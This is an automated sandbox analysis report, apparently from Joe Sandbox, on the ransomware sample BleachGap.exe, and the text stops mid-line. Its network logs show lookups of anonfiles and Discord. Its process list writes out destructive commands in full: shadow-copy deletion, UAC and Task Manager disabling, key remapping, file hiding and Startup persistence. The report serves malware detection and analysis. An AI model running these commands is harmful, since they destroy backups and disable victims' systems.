Feb 15, 2021 00:27:57.577717066 CET	53	53195	8.8.8.8	192.168.2.3
Feb 15, 2021 00:27:58.470666885 CET	50141	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:27:58.521076918 CET	53	50141	8.8.8.8	192.168.2.3
Feb 15, 2021 00:27:59.684597015 CET	53023	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:27:59.733490944 CET	53	53023	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:00.531313896 CET	49563	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:00.582927942 CET	53	49563	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:01.729010105 CET	51352	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:01.780587912 CET	53	51352	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:02.621982098 CET	59349	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:02.679101944 CET	53	59349	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:03.410129070 CET	57084	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:03.458993912 CET	53	57084	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:17.807781935 CET	58823	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:17.856560946 CET	53	58823	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:19.556219101 CET	57568	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:19.607305050 CET	53	57568	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:27.203918934 CET	50540	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:27.263122082 CET	53	50540	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:37.727266073 CET	54366	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:37.785849094 CET	53	54366	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:38.973404884 CET	53034	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:39.022222042 CET	53	53034	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:48.608345032 CET	57762	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:48.672734976 CET	53	57762	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:49.705033064 CET	55435	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:49.762448072 CET	53	55435	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:50.319649935 CET	50713	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:50.382319927 CET	53	50713	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:50.669658899 CET	56132	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:50.729481936 CET	53	56132	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:51.062500000 CET	58987	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:51.122745037 CET	53	58987	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:51.403878927 CET	56579	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:51.465769053 CET	53	56579	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:52.192730904 CET	60633	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:52.244221926 CET	53	60633	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:52.244822025 CET	61292	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:52.320334911 CET	53	61292	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:52.807909012 CET	63619	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:52.865330935 CET	53	63619	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:53.416928053 CET	64938	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:53.493019104 CET	53	64938	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:53.913541079 CET	61946	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:53.972958088 CET	53	61946	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:54.355117083 CET	64910	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:54.412152052 CET	53	64910	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:54.867985964 CET	52123	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:54.924988985 CET	53	52123	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:55.379533052 CET	56130	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:55.439358950 CET	53	56130	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:55.983351946 CET	56338	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:56.032058954 CET	53	56338	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:56.617532969 CET	59420	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:56.683053970 CET	53	59420	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:56.736433029 CET	58784	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:56.793662071 CET	53	58784	8.8.8.8	192.168.2.3
Feb 15, 2021 00:28:57.210146904 CET	63978	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:28:57.275033951 CET	53	63978	8.8.8.8	192.168.2.3
Feb 15, 2021 00:29:00.466614008 CET	62938	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:29:00.524998903 CET	53	62938	8.8.8.8	192.168.2.3
Feb 15, 2021 00:29:32.483248949 CET	55708	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:29:32.532157898 CET	53	55708	8.8.8.8	192.168.2.3
Feb 15, 2021 00:29:33.583795071 CET	56803	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:29:33.643337011 CET	53	56803	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 15, 2021 00:28:19.556219101 CET	192.168.2.3	8.8.8.8	0x359a	Standard query (0)	discord.com	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:48.608345032 CET	192.168.2.3	8.8.8.8	0xbd71	Standard query (0)	cdn-115.anonfiles.com	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:49.705033064 CET	192.168.2.3	8.8.8.8	0x161a	Standard query (0)	cdn-115.anonfiles.com	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:50.319649935 CET	192.168.2.3	8.8.8.8	0xfdaf	Standard query (0)	cdn-115.anonfiles.com	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:50.669658899 CET	192.168.2.3	8.8.8.8	0x167e	Standard query (0)	anonfiles.com	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:51.062500000 CET	192.168.2.3	8.8.8.8	0x58db	Standard query (0)	cdn-115.anonfiles.com	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:51.403878927 CET	192.168.2.3	8.8.8.8	0xd41	Standard query (0)	anonfiles.com	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:52.192730904 CET	192.168.2.3	8.8.8.8	0x63e4	Standard query (0)	discord.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 15, 2021 00:28:19.607305050 CET	8.8.8.8	192.168.2.3	0x359a	No error (0)	discord.com	162.159.135.232	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:19.607305050 CET	8.8.8.8	192.168.2.3	0x359a	No error (0)	discord.com	162.159.137.232	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:19.607305050 CET	8.8.8.8	192.168.2.3	0x359a	No error (0)	discord.com	162.159.136.232	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:19.607305050 CET	8.8.8.8	192.168.2.3	0x359a	No error (0)	discord.com	162.159.128.233	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:19.607305050 CET	8.8.8.8	192.168.2.3	0x359a	No error (0)	discord.com	162.159.138.232	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:48.672734976 CET	8.8.8.8	192.168.2.3	0xbd71	No error (0)	cdn-115.anonfiles.com	217.64.149.38	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:49.762448072 CET	8.8.8.8	192.168.2.3	0x161a	No error (0)	cdn-115.anonfiles.com	217.64.149.38	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:50.382319927 CET	8.8.8.8	192.168.2.3	0xfdaf	No error (0)	cdn-115.anonfiles.com	217.64.149.38	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:50.729481936 CET	8.8.8.8	192.168.2.3	0x167e	No error (0)	anonfiles.com	104.21.44.138	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:50.729481936 CET	8.8.8.8	192.168.2.3	0x167e	No error (0)	anonfiles.com	172.67.200.150	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:51.122745037 CET	8.8.8.8	192.168.2.3	0x58db	No error (0)	cdn-115.anonfiles.com	217.64.149.38	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:51.465769053 CET	8.8.8.8	192.168.2.3	0xd41	No error (0)	anonfiles.com	172.67.200.150	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:51.465769053 CET	8.8.8.8	192.168.2.3	0xd41	No error (0)	anonfiles.com	104.21.44.138	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:52.244221926 CET	8.8.8.8	192.168.2.3	0x63e4	No error (0)	discord.com	162.159.137.232	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:52.244221926 CET	8.8.8.8	192.168.2.3	0x63e4	No error (0)	discord.com	162.159.138.232	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:52.244221926 CET	8.8.8.8	192.168.2.3	0x63e4	No error (0)	discord.com	162.159.135.232	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:52.244221926 CET	8.8.8.8	192.168.2.3	0x63e4	No error (0)	discord.com	162.159.128.233	A (IP address)	IN (0x0001)
Feb 15, 2021 00:28:52.244221926 CET	8.8.8.8	192.168.2.3	0x63e4	No error (0)	discord.com	162.159.136.232	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 15, 2021 00:28:19.726794958 CET	162.159.135.232	443	192.168.2.3	49724	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Tue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
Feb 15, 2021 00:28:19.726794958 CET	162.159.135.232	443	192.168.2.3	49724	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		ce5f3254611a8c095a3d821d44539877

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: BleachGap.exe PID: 3292 Parent PID: 5616

General

Start time:	00:27:54
Start date:	15/02/2021
Path:	C:\Users\user\Desktop\BleachGap.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\BleachGap.exe'
Imagebase:	0x400000
File size:	1025024 bytes
MD5 hash:	015BB16DDCBF8A6326EC859020466C05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AESCRYPTTool, Description: Yara detected AESCRYPT Tool, Source: 00000000.00000002.549484552.0000000000B40000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000000.00000002.550028845.0000000002790000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000000.00000002.550028845.0000000002790000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000000.00000002.549851514.0000000002590000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000000.00000002.549851514.0000000002590000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000000.00000002.550041305.0000000002797000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000000.00000002.549865164.00000000025A0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000000.00000002.549865164.00000000025A0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 4472 Parent PID: 3292

General

Start time:	00:27:55
Start date:	15/02/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\sysnative\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\1C80.bat C:\Users\user\Desktop\BleachGap.exe'
Imagebase:	0x7ff77d8b0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4448 Parent PID: 4472

General

Start time:	00:27:55
Start date:	15/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WMIC.exe PID: 912 Parent PID: 4472

General

Start time:	00:27:55
Start date:	15/02/2021
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic shadowcopy delete
Imagebase:	0x7ff6aa0e0000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000003.00000002.203556300.00000172CC1B0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000003.00000002.203003347.00000172CA3E0000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000003.00000002.202876581.00000172CA1D9000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000003.00000002.203007148.00000172CA3E4000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000003.00000002.202871401.00000172CA1D0000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: vssadmin.exe PID: 1276 Parent PID: 4472

General

Start time:	00:27:58
Start date:	15/02/2021
Path:	C:\Windows\System32\vssadmin.exe
Wow64 process (32bit):	false
Commandline:	vssadmin delete shadows /all /quiet
Imagebase:	0x7ff68bfa0000
File size:	145920 bytes
MD5 hash:	47D51216EF45075B5F7EAA117CC70E40
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000006.00000002.204799183.00000220B20E0000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000006.00000002.204762520.00000220B1DF6000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000006.00000002.204757687.00000220B1DF0000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000006.00000002.204803949.00000220B20E4000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000006.00000002.204817158.00000220B3700000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: reg.exe PID: 6080 Parent PID: 4472

General

Start time:	00:27:58
Start date:	15/02/2021
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'PromptOnSecureDesktop' /t REG_DWORD /d '0' /f
Imagebase:	0x7ff65c730000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000007.00000002.206125663.00000258A5910000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000007.00000002.205843003.00000258A5660000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000007.00000002.206146430.00000258A5914000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: reg.exe PID: 2100 Parent PID: 4472

General

Start time:	00:27:59
Start date:	15/02/2021
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'ConsentPromptBehaviorAdmin' /t REG_DWORD /d '0' /f
Imagebase:	0x7ff65c730000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000008.00000002.208226382.000001EFEBD84000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000008.00000002.208231540.000001EFEBDF0000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000008.00000002.208221509.000001EFEBD80000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: reg.exe PID: 3112 Parent PID: 4472

General

Start time:	00:28:00
Start date:	15/02/2021
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'EnableLUA' /t REG_DWORD /d '1' /f
Imagebase:	0x7ff65c730000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000009.00000002.209880773.0000028936510000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000009.00000002.209683392.0000028936250000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000009.00000002.209894285.0000028936514000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: reg.exe PID: 4064 Parent PID: 4472

General

Start time:	00:28:01
Start date:	15/02/2021
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD 'HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout' /v 'Scancode Map' /t REG_BINARY /d '00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000' /f /reg:64
Imagebase:	0x7ff65c730000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000000A.00000002.211375187.000002567D7F0000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000000A.00000002.211500104.000002567DA30000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000000A.00000002.211507385.000002567DA34000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: reg.exe PID: 2796 Parent PID: 4472

General

Start time:	00:28:02
Start date:	15/02/2021
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System' /v 'DisableTaskMgr' /t REG_DWORD /d '1' /f
Imagebase:	0x7ff65c730000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000000B.00000002.213282265.000002899B580000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000000B.00000002.213129651.000002899B2D0000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000000B.00000002.213298230.000002899B584000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: reg.exe PID: 6020 Parent PID: 4472

General

Start time:	00:28:02
Start date:	15/02/2021
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD 'HKCU\Control Panel\Mouse' /v SwapMouseButtons /t REG_SZ /d '1' /f
Imagebase:	0x7ff65c730000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000000C.00000002.214873488.00000198B6224000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000000C.00000002.214867220.00000198B6220000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000000C.00000002.214879842.00000198B6240000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: attrib.exe PID: 912 Parent PID: 4472

General

Start time:	00:28:03
Start date:	15/02/2021
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +r +s +h +a +i C:\Users\user\Desktop\BleachGap.exe
Imagebase:	0x7ff70ef10000
File size:	21504 bytes
MD5 hash:	FDC601145CD289C6FBC96D3F805F3CD7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: attrib.exe PID: 1276 Parent PID: 4472

General

Start time:	00:28:04
Start date:	15/02/2021
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +r +a +s +h +i 'C:\Users\user\AppData\Local\Temp\1C7E.tmp\aescrypt.exe'
Imagebase:	0x7ff70ef10000
File size:	21504 bytes
MD5 hash:	FDC601145CD289C6FBC96D3F805F3CD7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: attrib.exe PID: 6084 Parent PID: 4472

General

Start time:	00:28:04
Start date:	15/02/2021
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	true
Commandline:	attrib +r +a +s +h +i 'C:\Users\user\AppData\Local\Temp\1C7E.tmp\DiscordSendWebhook.exe'
Imagebase:	0x1a0000
File size:	21504 bytes
MD5 hash:	FDC601145CD289C6FBC96D3F805F3CD7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: BleachGap.exe PID: 3492 Parent PID: 3388

General

Start time:	00:28:05
Start date:	15/02/2021
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe'
Imagebase:	0x400000
File size:	1025024 bytes
MD5 hash:	015BB16DDCBF8A6326EC859020466C05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000011.00000003.425889191.0000000002767000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000011.00000003.425889191.0000000002767000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000011.00000003.425874542.0000000002870000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000011.00000003.425898742.0000000000810000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000011.00000003.425898742.0000000000810000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000011.00000003.425881894.0000000002760000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000011.00000003.425881894.0000000002760000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_AESCRYPTTool, Description: Yara detected AESCRYPT Tool, Source: 00000011.00000003.425794983.0000000002770000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cmd.exe PID: 4180 Parent PID: 3492

General

Start time:	00:28:06
Start date:	15/02/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\sysnative\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\47B6.bat 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe''
Imagebase:	0x7ff77d8b0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6120 Parent PID: 4180

General

Start time:	00:28:06
Start date:	15/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WMIC.exe PID: 4436 Parent PID: 4180

General

Start time:	00:28:07
Start date:	15/02/2021
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic shadowcopy delete
Imagebase:	0x7ff6aa0e0000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000014.00000002.224603355.00000232B79A0000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000014.00000002.224615954.00000232B79D0000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000014.00000002.224607469.00000232B79A4000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000014.00000002.224599691.00000232B7980000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000014.00000003.224188278.00000232B7A1F000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000014.00000003.224240165.00000232B7A0A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000014.00000003.224208445.00000232B79E3000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected 